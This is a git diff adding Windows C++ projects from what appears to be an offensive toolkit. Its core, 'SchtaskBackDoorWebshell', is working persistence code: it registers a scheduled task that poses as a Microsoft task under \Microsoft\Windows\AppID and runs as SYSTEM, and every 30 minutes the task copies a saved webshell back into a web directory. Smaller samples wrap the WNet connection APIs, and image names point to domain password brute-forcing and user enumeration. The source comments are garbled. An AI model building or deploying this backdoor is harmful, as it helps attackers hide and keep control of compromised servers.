+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SchtaskBackDoorWebshell", "SchtaskBackDoorWebshell.vcxproj", "{6BF9BC0B-8C41-4BF3-86F6-FF4651942671}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|x64 = Debug|x64
+ Debug|x86 = Debug|x86
+ Release|x64 = Release|x64
+ Release|x86 = Release|x86
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Debug|x64.ActiveCfg = Debug|x64
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Debug|x64.Build.0 = Debug|x64
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Debug|x86.ActiveCfg = Debug|Win32
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Debug|x86.Build.0 = Debug|Win32
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Release|x64.ActiveCfg = Release|x64
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Release|x64.Build.0 = Release|x64
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Release|x86.ActiveCfg = Release|Win32
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Release|x86.Build.0 = Release|Win32
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+ GlobalSection(ExtensibilityGlobals) = postSolution
+ SolutionGuid = {ED7739FF-5004-4C24-B0AC-C4462872896A}
+ EndGlobalSection
+EndGlobal
diff --git a/SchtaskBackDoorWebshell/SchtaskBackDoorWebshell.vcxproj b/SchtaskBackDoorWebshell/SchtaskBackDoorWebshell.vcxproj
new file mode 100644
index 0000000..bfec83d
--- /dev/null
+++ b/SchtaskBackDoorWebshell/SchtaskBackDoorWebshell.vcxproj
@@ -0,0 +1,150 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ 16.0
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}
+ SchtaskBackDoorWebshell
+ 10.0
+
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v110_xp
+ true
+ Unicode
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+ false
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ false
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/SchtaskBackDoorWebshell/SchtaskBackDoorWebshell.vcxproj.filters b/SchtaskBackDoorWebshell/SchtaskBackDoorWebshell.vcxproj.filters
new file mode 100644
index 0000000..f6343b9
--- /dev/null
+++ b/SchtaskBackDoorWebshell/SchtaskBackDoorWebshell.vcxproj.filters
@@ -0,0 +1,30 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+ 源文件
+
+
+ 源文件
+
+
+
+
+ 头文件
+
+
+
\ No newline at end of file
diff --git a/SchtaskBackDoorWebshell/TaskScheduler.cpp b/SchtaskBackDoorWebshell/TaskScheduler.cpp
new file mode 100644
index 0000000..5b963ae
--- /dev/null
+++ b/SchtaskBackDoorWebshell/TaskScheduler.cpp
@@ -0,0 +1,332 @@
+#include "TaskScheduler.h"
+
+
+void TaskSche::CopySelf()
+{
+ WCHAR pathF[MAX_LEN_FILENAME];
+ GetModuleFileName(NULL, pathF, sizeof(pathF));
+ WCHAR dest[] = _T("C:\\windows\\temp\\tempsh.exe");
+ wprintf(L"%s", pathF);
+ CopyFile(pathF, dest, false);
+}
+
+
+void TaskSche::copyFile(string source, string dest) {
+ ifstream src(source, ios::binary);
+ ofstream dst(dest, ios::binary);
+ dst << src.rdbuf();
+ dst.close();
+ src.close();
+}
+
+
+int TaskSche::isFileExist(LPSTR lpFilePath)
+{
+ /* Check for existence */
+ if ((_access(lpFilePath, 0)) != -1)
+ {
+ return 1;
+ }
+ else
+ {
+ return 0;
+ }
+}
+
+
+int TaskSche::TaskAdd(LPCWSTR wszTaskName, wstring wstrTaskTime, wstring wstrProgram, wstring args)
+{
+ // https://docs.microsoft.com/zh-cn/windows/win32/taskschd/time-trigger-example--c---
+ // https://docs.microsoft.com/zh-cn/windows/win32/taskschd/daily-trigger-example--c---
+
+ setlocale(LC_ALL, "");
+
+ // ʼCOM
+ HRESULT hr = CoInitializeEx(NULL, COINIT_MULTITHREADED);
+ if (FAILED(hr))
+ {
+ printf("\nCoInitializeEx failed: %x", hr);
+ return 1;
+ }
+
+
+ // ȫȼ
+ hr = CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, 0, NULL);
+ if (FAILED(hr))
+ {
+ printf("\nCoInitializeSecurity failed: %x", hr);
+ CoUninitialize();
+ return 1;
+ }
+
+ // üƻ
+ // LPCWSTR wszTaskName = L"StateGrid";
+ wprintf(L"TaskName:%s\n", wszTaskName);
+
+ // ִ·
+ wstring wstrExePath = _wgetenv(_bstr_t(L"WINDIR")); // ȡַĻ
+ wstrExePath += L"\\SYSTEM32\\";
+ wstrExePath += wstrProgram;
+
+
+ //
+ // Link: https://docs.microsoft.com/en-us/windows/win32/api/taskschd/nn-taskschd-itaskservice
+ // https://docs.microsoft.com/en-us/windows/win32/api/combaseapi/nf-combaseapi-cocreateinstance
+ ITaskService* pService = NULL;
+ hr = CoCreateInstance(CLSID_TaskScheduler, NULL, CLSCTX_INPROC_SERVER, IID_ITaskService, (void**)&pService);
+ if (FAILED(hr))
+ {
+ printf("Failed to create an instance of ITaskService: %x", hr);
+ CoUninitialize();
+ return 1;
+ }
+
+ // ĿΪԶӻط https://docs.microsoft.com/en-us/windows/win32/api/taskschd/nf-taskschd-itaskservice-connect
+ hr = pService->Connect(_variant_t(), _variant_t(), _variant_t(), _variant_t()); //Ĭϱ
+ if (FAILED(hr))
+ {
+ printf("ITaskService::Connect failed: %x", hr);
+ pService->Release();
+ CoUninitialize();
+ return 1;
+ }
+
+ // ȡļвд
+ ITaskFolder* pRootFolder = NULL; https://docs.microsoft.com/en-us/windows/win32/api/taskschd/nf-taskschd-itaskservice-getfolder
+ // ƻ·
+ hr = pService->GetFolder(_bstr_t(L"\\Microsoft\\Windows\\AppID"), &pRootFolder); // _bstr_t wstrתΪbstr
+ if (FAILED(hr))
+ {
+ printf("Cannot get Root folder pointer: %x", hr);
+ pService->Release();
+ CoUninitialize();
+ return 1;
+ }
+ wprintf(L"Task Path\\Microsoft\\Windows\\AppID\n");
+
+ // ǷѾƻ
+ IRegisteredTask* pExistingTask = NULL;
+ hr = pRootFolder->GetTask(_bstr_t(wszTaskName), &pExistingTask);
+ if (hr == S_OK)
+ {
+ printf("Task exist!\n");
+ return 1;
+ }
+ printf("Create New Task\n");
+
+ // ͬɾ
+ // pRootFolder->DeleteTask(_bstr_t(wszTaskName), 0);
+
+ // ƻƻ
+ ITaskDefinition* pTask = NULL; // https://docs.microsoft.com/en-us/windows/win32/api/taskschd/nn-taskschd-itaskdefinition
+ hr = pService->NewTask(0, &pTask); // https://docs.microsoft.com/en-us/windows/win32/api/taskschd/nf-taskschd-itaskservice-newtask
+ pService->Release(); // COM clean up. Pointer is no longer used.
+ if (FAILED(hr))
+ {
+ printf("Failed to CoCreate an instance of the TaskService class: %x", hr);
+ pRootFolder->Release();
+ CoUninitialize();
+ return 1;
+ }
+
+
+ // ʹIRegistrationInfoĻϢ
+ // https://docs.microsoft.com/en-us/windows/win32/api/taskschd/nn-taskschd-iregistrationinfo
+ // ȡעϢԼעڡ
+ // ITaskDefinition :: get_RegistrationInfo https://docs.microsoft.com/en-us/windows/win32/api/taskschd/nf-taskschd-itaskdefinition-get_registrationinfo
+ IRegistrationInfo* pRegInfo = NULL;
+ hr = pTask->get_RegistrationInfo(&pRegInfo);
+ if (FAILED(hr))
+ {
+ printf("\nCannot get identification pointer: %x", hr);
+ pRootFolder->Release();
+ pTask->Release();
+ CoUninitialize();
+ return 1;
+ }
+
+ //
+ hr = pRegInfo->put_Author(_bstr_t(L"Microsoft Corporation"));
+ pRegInfo->Release();
+ if (FAILED(hr))
+ {
+ printf("\nCannot put identification info: %x", hr);
+ pRootFolder->Release();
+ pTask->Release();
+ CoUninitialize();
+ return 1;
+ }
+
+
+
+
+ // İȫƾ֤ https://docs.microsoft.com/zh-cn/windows/win32/api/taskschd/nn-taskschd-iprincipal
+ IPrincipal* pPrincipal = NULL;
+ hr = pTask->get_Principal(&pPrincipal); // ȡ壬ṩİȫƾݡ
+ if (FAILED(hr))
+ {
+ printf("\nCannot get principal pointer: %x", hr);
+ pRootFolder->Release();
+ pTask->Release();
+ CoUninitialize();
+ return 1;
+ }
+
+ // ùΪʽ¼
+ pPrincipal->put_LogonType(TASK_LOGON_INTERACTIVE_TOKEN); // ʹûǰĵ¼Ϣ
+ //pPrincipal->put_RunLevel(TASK_RUNLEVEL_HIGHEST);
+ pPrincipal->put_UserId(_bstr_t(L"NT AUTHORITY\\SYSTEM")); // systemȨִУԵǰûȨҪǹԱȨ
+
+ // Ϣ,ƻѡĸϢ https://docs.microsoft.com/zh-cn/windows/win32/api/taskschd/nn-taskschd-itasksettings
+ ITaskSettings* pTaskSettings = NULL;
+ pTask->get_Settings(&pTaskSettings);
+
+ // ΪϢֵ
+ pTaskSettings->put_StartWhenAvailable(VARIANT_TRUE); // ĬΪVARIANT_TRUE https://docs.microsoft.com/zh-cn/windows/win32/api/taskschd/nf-taskschd-itasksettings-put_startwhenavailable
+
+ // idle
+ IIdleSettings* pIdleSettings = NULL;
+ pTaskSettings->get_IdleSettings(&pIdleSettings);
+ pIdleSettings->put_WaitTimeout(_bstr_t(L"PT5M"));
+
+ // IJУһܹ
+ pTaskSettings->put_MultipleInstances(TASK_INSTANCES_PARALLEL); // https://docs.microsoft.com/zh-cn/windows/win32/api/taskschd/nf-taskschd-itasksettings-get_multipleinstances https://docs.microsoft.com/zh-cn/windows/win32/taskschd/taskschedulerschema-multipleinstancespolicytype-simpletype
+
+
+ //
+ ITriggerCollection* pTriggerCollection = NULL;
+ hr = pTask->get_Triggers(&pTriggerCollection); // ȡĴļϡ
+ if (FAILED(hr))
+ {
+ printf("\nCannot get trigger collection: %x", hr);
+ pRootFolder->Release();
+ pTask->Release();
+ CoUninitialize();
+ return 1;
+ }
+
+ ITrigger* pTrigger = NULL;
+
+ //
+ /*
+ ´https://docs.microsoft.com/en-us/windows/win32/api/taskschd/nf-taskschd-itriggercollection-create
+ ԣhttps://docs.microsoft.com/en-us/windows/win32/api/mstask/ns-mstask-task_trigger
+ https://docs.microsoft.com/zh-cn/windows/win32/api/mstask/nf-mstask-itasktrigger-settrigger
+ TASK_TRIGGER_LOGON: ضû¼ʱ
+ TASK_TRIGGER_TIME: һضʱ䴥
+ */
+
+ // ʱ
+ /*
+ еƵԼظظģʽʱ䣺https://docs.microsoft.com/en-us/windows/win32/api/taskschd/nn-taskschd-irepetitionpattern
+
+ ITrigger :: put_StartBoundary üںʱ䡣ںʱ¸ʽYYYY-MM-DDTHHMMSS+-HHMMʽģ+-HHMMֶЭʱUTC֮ǰ֮ضСʱͷ磬200510111:21:17UTCʱСʱдΪ2005-10-11T132117
+ https://docs.microsoft.com/en-us/windows/win32/api/taskschd/nf-taskschd-itrigger-put_startboundary
+
+ repetitionType ָģʽظʱ䡣ַĸʽΪPnYnMnDTnHnMnSnYnMnD T/ʱָnHСʱnMǷnS磬PT5Mָ5ӣP1M4DT2H5Mָһ£죬Сʱӣ
+ https://docs.microsoft.com/zh-cn/windows/win32/taskschd/taskschedulerschema-duration-repetitiontype-element
+
+
+ */
+
+ // ÿ
+ hr = pTriggerCollection->Create(TASK_TRIGGER_TIME, &pTrigger);
+ pTriggerCollection->Release();
+ ITimeTrigger* pTimeTrigger = NULL;
+ pTrigger->QueryInterface(IID_ITimeTrigger, (void**)&pTimeTrigger);
+ pTimeTrigger->put_Id(_bstr_t(L"Trigger0"));
+ pTimeTrigger->put_StartBoundary(_bstr_t(L"2000-04-01T00:00:00")); // üںʱ:2000-04-01ʼÿ00:00:00
+ pTimeTrigger->put_EndBoundary(_bstr_t(L"2030-05-02T23:59:59")); // ͣôںʱ:2030-05-02 23:59:59
+ IRepetitionPattern* pRepetitionPattern = NULL;
+ pTimeTrigger->get_Repetition(&pRepetitionPattern);
+ pTimeTrigger->Release();
+ pRepetitionPattern->put_Duration(_bstr_t(L"")); // ģʽظʱ䡣ڳʱδָκֵģʽظ
+ // pRepetitionPattern->put_Interval(_bstr_t(L"PT30M")); // ÿ֮ʱ䡣ÿô
+ pRepetitionPattern->put_Interval(_bstr_t(wstrTaskTime.data())); // ÿ֮ʱ䡣ÿô
+ pRepetitionPattern->Release();
+
+
+
+ // ÿ
+ /*
+ hr = pTriggerCollection->Create(TASK_TRIGGER_DAILY, &pTrigger);
+ pTriggerCollection->Release();
+ IDailyTrigger* pDailyTrigger = NULL;
+ pTrigger->QueryInterface(IID_IDailyTrigger, (void**)&pDailyTrigger);
+ pDailyTrigger->put_Id(_bstr_t(L"Trigger0"));
+ pDailyTrigger->put_StartBoundary(_bstr_t(L"2000-04-01T00:00:00")); // üںʱ:2000-04-01ʼÿ00:00:00
+ pDailyTrigger->put_EndBoundary(_bstr_t(L"2030-05-02T23:59:59")); // ͣôںʱ:2030-05-02 23:59:59
+ pDailyTrigger->put_DaysInterval((short)1); // üƻи֮ļ1ÿռƻ2ÿһʱ
+ IRepetitionPattern* pRepetitionPattern = NULL;
+ pDailyTrigger->get_Repetition(&pRepetitionPattern);
+ pDailyTrigger->Release();
+ pRepetitionPattern->put_Duration(_bstr_t(L"")); // ģʽظʱ䡣ڳʱδָκֵģʽظ
+ pRepetitionPattern->put_Interval(_bstr_t(L"PT1M")); // ÿ֮ʱ䡣ÿô
+ pRepetitionPattern->Release();
+ */
+
+
+ // ʱ䴥
+ /*
+ pTriggerCollection->Create(TASK_TRIGGER_TIME, &pTrigger);
+ ITimeTrigger* pTimeTrigger = NULL;
+ pTrigger->QueryInterface(IID_ITimeTrigger, (void**)&pTimeTrigger);
+ pTimeTrigger->put_Id(_bstr_t(L"Trigger1"));
+ pTimeTrigger->put_EndBoundary(_bstr_t(L"2020-03-29T20:00:00"));
+ pTimeTrigger->put_StartBoundary(_bstr_t(L"2020-03-26T13:00:00"));
+ */
+
+ // ¼
+ /*
+ pTriggerCollection->Create(TASK_TRIGGER_LOGON, &pTrigger);
+ ILogonTrigger* pLogonTrigger = NULL;
+ pTrigger->QueryInterface(IID_ILogonTrigger, (void**)&pLogonTrigger);
+ pLogonTrigger->put_Id(_bstr_t(L"Trigger2"));
+ //pLogonTrigger->put_UserId(_bstr_t(L"desktop-gdep6gd\\user"));
+ //pLogonTrigger->put_EndBoundary(_bstr_t(L"2020-03-29T20:00:00"));
+ pLogonTrigger->put_StartBoundary(_bstr_t(L"2020-03-25T20:00:00"));
+ */
+
+
+ //
+ /*
+ pTriggerCollection->Create(TASK_TRIGGER_BOOT, &pTrigger);
+ IBootTrigger* pBootTrigger;
+ pTrigger->QueryInterface(IID_IBootTrigger, (void**)&pBootTrigger);
+ pBootTrigger->put_Id(_bstr_t(L"Trigger3"));
+ pBootTrigger->put_EndBoundary(_bstr_t(L"2020-03-29T20:00:00"));
+ pBootTrigger->put_StartBoundary(_bstr_t(L"2020-03-25T20:00:00"));
+ */
+
+ //
+ IActionCollection* pActionCollection = NULL;
+ pTask->get_Actions(&pActionCollection);
+ IAction* pAction = NULL;
+ pActionCollection->Create(TASK_ACTION_EXEC, &pAction); // TASK_ACTION_EXEC: òִв磬òнűִļߣṩĵƣҵӦóʹĵӦó
+ IExecAction* pExecAction = NULL; // IExecAction ʾִвIJ
+ pAction->QueryInterface(IID_IExecAction, (void**)&pExecAction);
+ pExecAction->put_Path(_bstr_t(wstrExePath.c_str())); // ȡÿִļ·
+ pExecAction->Release();
+
+ // ִгIJ
+
+ // wstring args(L"/c C:\\windows\\temp\\StateGrid.exe");
+ // args.append(cmd);
+ // args += argv[2];
+
+ wprintf(L"Command:%s %s\n", wstrProgram.data(), args.data());
+ pExecAction->put_Arguments(_bstr_t(args.data()));
+
+
+ // pExecAction->put_Arguments(_bstr_t(L"/c calc"));
+
+ IRegisteredTask* pRegistredTask = NULL;
+ pRootFolder->RegisterTaskDefinition(_bstr_t(wszTaskName), pTask, TASK_CREATE_OR_UPDATE,
+ _variant_t(), _variant_t(), TASK_LOGON_INTERACTIVE_TOKEN, _variant_t(), &pRegistredTask);
+
+ cout << "\n .\n" << endl;
+ wprintf(L"**********\n");
+ CoUninitialize();
+ return 0;
+
+}
\ No newline at end of file
diff --git a/SchtaskBackDoorWebshell/TaskScheduler.h b/SchtaskBackDoorWebshell/TaskScheduler.h
new file mode 100644
index 0000000..fa929ae
--- /dev/null
+++ b/SchtaskBackDoorWebshell/TaskScheduler.h
@@ -0,0 +1,37 @@
+#pragma once
+#define _CRT_SECURE_NO_WARNINGS // ȫ
+#include
+#include
+#include
+#include // std::wstring
+#include
+#include
+#include // ITaskService
+#include "comdef.h" // _bstr_t
+#include "string.h"
+#include
+#include
+#include
+#include // src dst
+
+#define _WIN32_DCOM
+
+// Include the task header file.
+#pragma comment(lib, "taskschd.lib")
+#pragma comment(lib, "comsupp.lib")
+#pragma comment(lib, "credui.lib")
+using namespace std;
+#define MAX_LEN_FILENAME 1024
+
+class TaskSche
+{
+public:
+ int TaskAdd(LPCWSTR wszTaskName, wstring wstrTaskTime, wstring wstrProgram, wstring args);
+ void CopySelf();
+ int isFileExist(LPSTR lpFilePath);
+ void copyFile(string source, string dest);
+
+private:
+
+};
+
diff --git "a/SchtaskBackDoorWebshell/\346\272\220.cpp" "b/SchtaskBackDoorWebshell/\346\272\220.cpp"
new file mode 100644
index 0000000..a0d0ada
--- /dev/null
+++ "b/SchtaskBackDoorWebshell/\346\272\220.cpp"
@@ -0,0 +1,51 @@
+#include "TaskScheduler.h"
+
+// wchar_t to string
+void Wchar_tToString(std::string& szDst, wchar_t* wchar)
+{
+ wchar_t* wText = wchar;
+ DWORD dwNum = WideCharToMultiByte(CP_OEMCP, NULL, wText, -1, NULL, 0, NULL, FALSE);// WideCharToMultiByte
+ char* psText; // psTextΪchar*ʱ飬Ϊֵstd::stringм
+ psText = new char[dwNum];
+ WideCharToMultiByte(CP_OEMCP, NULL, wText, -1, psText, dwNum, NULL, FALSE);// WideCharToMultiByteٴ
+ szDst = psText;// std::stringֵ
+ delete[]psText;// psText
+}
+
+// localestringͷļʹsetlocale
+std::wstring StringToWstring(const std::string str)
+{// stringתwstring
+ unsigned len = str.size() * 2;// Ԥֽ
+ setlocale(LC_CTYPE, ""); //ô˺
+ wchar_t* p = new wchar_t[len];// һڴתַ
+ mbstowcs(p, str.c_str(), len);// ת
+ std::wstring str1(p);
+ delete[] p;// ͷڴ
+ return str1;
+}
+
+int wmain(int argc, wchar_t* argv[]) {
+ TaskSche task;
+ if (argc == 2) {
+ string strFilePath;
+ Wchar_tToString(strFilePath, argv[1]);
+ if (!task.isFileExist((LPSTR)"C:\\windows\\temp\\tempsh.txt"))
+ {
+ task.copyFile(strFilePath.data(), "C:\\windows\\temp\\tempsh.txt");
+ }
+
+ LPCWSTR wszTaskName = L"ProgramDataUpdateWeb"; // ƻ
+ wstring wstrTaskTime = L"PT30M"; // ÿ֮ʱ䡣ÿô
+ wstring wstrProgram = L"cmd.exe"; // ִеijcmd.exerundll32.exe
+ wstring args = L"/c copy c:\\windows\\temp\\tempsh.txt ";
+ args.append(StringToWstring(strFilePath).data());
+ wprintf(L"%s\n", args.data());
+ task.TaskAdd(wszTaskName, wstrTaskTime, wstrProgram, args);
+ }
+ else {
+ wprintf(L"Usage: %s c:\\www\\1.txt", argv[0]);
+ }
+
+
+
+}
\ No newline at end of file
diff --git a/WNetCancelConnection2/WNetCancelConnection2.vcxproj b/WNetCancelConnection2/WNetCancelConnection2.vcxproj
new file mode 100644
index 0000000..c4470d3
--- /dev/null
+++ b/WNetCancelConnection2/WNetCancelConnection2.vcxproj
@@ -0,0 +1,146 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ 16.0
+ {CD50DA00-9955-42DC-9F9A-21FD27F04900}
+ WNetCancelConnection2
+ 10.0
+
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ false
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/WNetCancelConnection2/WNetCancelConnection2.vcxproj.filters b/WNetCancelConnection2/WNetCancelConnection2.vcxproj.filters
new file mode 100644
index 0000000..2934970
--- /dev/null
+++ b/WNetCancelConnection2/WNetCancelConnection2.vcxproj.filters
@@ -0,0 +1,22 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+ 源文件
+
+
+
\ No newline at end of file
diff --git "a/WNetCancelConnection2/\346\272\220.cpp" "b/WNetCancelConnection2/\346\272\220.cpp"
new file mode 100644
index 0000000..867d691
--- /dev/null
+++ "b/WNetCancelConnection2/\346\272\220.cpp"
@@ -0,0 +1,40 @@
+#ifndef UNICODE
+#define UNICODE
+#endif
+#pragma comment(lib, "mpr.lib") // WinnetҪĶ̬ӿ
+
+#include
+#include
+#include
+#include // ͷ
+
+// Need to link with Netapi32.lib and Mpr.lib
+
+int wmain(int argc, wchar_t* argv[])
+{
+
+ DWORD dwRetVal;
+
+ if (argc != 2) {
+ wprintf(L"Usage: %s \n",
+ argv[0]);
+ wprintf(L" %s \\\\contoso\n",
+ argv[0]);
+ exit(1);
+ }
+
+ wprintf(L"Calling WNetCancelConnection2 with\n");
+ wprintf(L" lpName = %s\n", argv[1]);
+
+ dwRetVal = WNetCancelConnection2(argv[1], 0, TRUE);
+ //
+ // If the call succeeds, inform the user; otherwise,
+ // print the error.
+ //
+ if (dwRetVal == NO_ERROR)
+ wprintf(L"Connection cancel to %s\n", argv[1]);
+ else
+ wprintf(L"WNetCancelConnection2 failed with error: %u\n", dwRetVal);
+
+ exit(1);
+}
\ No newline at end of file
diff --git a/imgs/BlastDomainUserPwd_domainUser.png b/imgs/BlastDomainUserPwd_domainUser.png
new file mode 100644
index 0000000..5b3c834
Binary files /dev/null and b/imgs/BlastDomainUserPwd_domainUser.png differ
diff --git a/imgs/BlastDomainUserPwd_success.png b/imgs/BlastDomainUserPwd_success.png
new file mode 100644
index 0000000..bd63f61
Binary files /dev/null and b/imgs/BlastDomainUserPwd_success.png differ
diff --git a/imgs/BlastDomainUserPwd_use.png b/imgs/BlastDomainUserPwd_use.png
new file mode 100644
index 0000000..8ba200f
Binary files /dev/null and b/imgs/BlastDomainUserPwd_use.png differ
diff --git a/imgs/EnuDomainUser.png b/imgs/EnuDomainUser.png
new file mode 100644
index 0000000..04fc709
Binary files /dev/null and b/imgs/EnuDomainUser.png differ
diff --git a/imgs/NetGroupGetUsers.png b/imgs/NetGroupGetUsers.png
new file mode 100644
index 0000000..b5656d5
Binary files /dev/null and b/imgs/NetGroupGetUsers.png differ
diff --git a/imgs/NetLocalGroupEnum.png b/imgs/NetLocalGroupEnum.png
new file mode 100644
index 0000000..444ac65
Binary files /dev/null and b/imgs/NetLocalGroupEnum.png differ
diff --git a/imgs/NetLocalGroupGetMembers.png b/imgs/NetLocalGroupGetMembers.png
new file mode 100644
index 0000000..a2b9366
Binary files /dev/null and b/imgs/NetLocalGroupGetMembers.png differ
diff --git a/imgs/NetUserEnum.png b/imgs/NetUserEnum.png
new file mode 100644
index 0000000..405ad08
Binary files /dev/null and b/imgs/NetUserEnum.png differ
diff --git a/imgs/WNetCancelConnection2.png b/imgs/WNetCancelConnection2.png
new file mode 100644
index 0000000..29618d8
Binary files /dev/null and b/imgs/WNetCancelConnection2.png differ
diff --git "a/imgs/webshell\350\256\241\345\210\222\344\273\273\345\212\241\345\220\216\351\227\250.mov" "b/imgs/webshell\350\256\241\345\210\222\344\273\273\345\212\241\345\220\216\351\227\250.mov"
new file mode 100644
index 0000000..f1afea0
Binary files /dev/null and "b/imgs/webshell\350\256\241\345\210\222\344\273\273\345\212\241\345\220\216\351\227\250.mov" differ
diff --git a/imgs/wnetaddconnection2a.png b/imgs/wnetaddconnection2a.png
new file mode 100644
index 0000000..f4041cd
Binary files /dev/null and b/imgs/wnetaddconnection2a.png differ
diff --git a/wnetaddconnection2a/wnetaddconnection2a.vcxproj b/wnetaddconnection2a/wnetaddconnection2a.vcxproj
new file mode 100644
index 0000000..c0d616d
--- /dev/null
+++ b/wnetaddconnection2a/wnetaddconnection2a.vcxproj
@@ -0,0 +1,146 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ 16.0
+ {3220347A-637E-4881-8226-799160A983DB}
+ wnetaddconnection2a
+ 10.0
+
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ false
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/wnetaddconnection2a/wnetaddconnection2a.vcxproj.filters b/wnetaddconnection2a/wnetaddconnection2a.vcxproj.filters
new file mode 100644
index 0000000..2934970
--- /dev/null
+++ b/wnetaddconnection2a/wnetaddconnection2a.vcxproj.filters
@@ -0,0 +1,22 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+ 源文件
+
+
+
\ No newline at end of file
diff --git "a/wnetaddconnection2a/\346\272\220.cpp" "b/wnetaddconnection2a/\346\272\220.cpp"
new file mode 100644
index 0000000..d73426a
--- /dev/null
+++ "b/wnetaddconnection2a/\346\272\220.cpp"
@@ -0,0 +1,62 @@
+#ifndef UNICODE
+#define UNICODE
+#endif
+#pragma comment(lib, "mpr.lib") // WinnetҪĶ̬ӿ
+
+#include
+#include
+#include
